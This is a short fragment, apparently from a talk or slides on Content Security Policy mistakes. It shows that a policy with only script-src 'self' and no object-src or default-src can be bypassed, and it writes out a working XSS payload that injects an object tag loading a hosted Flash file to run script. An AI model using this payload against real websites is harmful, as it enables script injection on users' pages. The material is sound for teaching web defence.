mistake #3 script-src ‘self’; Look’s secure, but… Missing object-src or default-src directive “>’><object type=”application/x-shockwavw-flash” data=’https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/c harts/assets/charts.swf?allowedDomain=\”})))}catch(e) {alert(12345)}//’><param name=”AllowScriptAccess” value=”always”></object> Bypass: